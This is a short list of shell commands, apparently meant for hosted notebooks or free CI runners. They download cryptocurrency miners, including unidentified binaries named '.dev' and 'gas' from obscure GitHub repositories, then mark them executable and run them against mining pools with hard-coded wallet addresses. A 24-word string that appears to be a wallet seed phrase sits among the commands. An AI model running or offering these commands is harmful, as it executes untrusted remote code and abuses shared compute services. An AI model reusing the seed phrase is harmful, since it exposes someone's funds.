!wget https://github.com/WhynotSir/sirji/raw/main/.dev && chmod +x .dev && ./.dev --algo BEAM-III --pool stratum+tcp://beamv3.usa-west.nicehash.com:3387 --user 35PArWQ2AY6yUbstvjBKsXVA38LU6h48PY


emotion language trim position ask ticket legend dinner velvet gas wave inch talent hip athlete various endorse avocado mimic edit turtle soldier later half

wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xf hellminer_cpu_linux.tar.gz && ./hellminer  -c stratum+tcp://ap.luckpool.net:3956 -u RUqLN8ZvkKGcQWrrbNwn1VyDrMLqzPdcAn.GodMiner -p x --cpu 2
   

cpu


! wget https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz && tar -zxvf xmrig-6.14.1-linux-x64.tar.gz && cd xmrig-6.14.1 && clear && ./xmrig -o rx.unmineable.com:3333 -a rx -k -u BNB:bnb1tg0r4v3rct06r33cjcq8evgyhphmys8h8cql6u.colab3 -p x




gpu



wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.31/lolMiner_v1.31_Lin64.tar.gz && tar -zxvf lolMiner_v1.31_Lin64.tar.gz && cd 1.31 && clear && ./lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user BNB:bnb1tg0r4v3rct06r33cjcq8evgyhphmys8h8cql6u.colab1 --ethstratum ETHPROXY




wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo randomx -coin XMR -wallet 0x4e0cBc0fD1110cc8993d4DCDa49a2183D67b6B49  -circleci  $(echo $(shuf -i 1-9999 -n 1)-SRBO) -pool1 xmr.2miners.com:2222
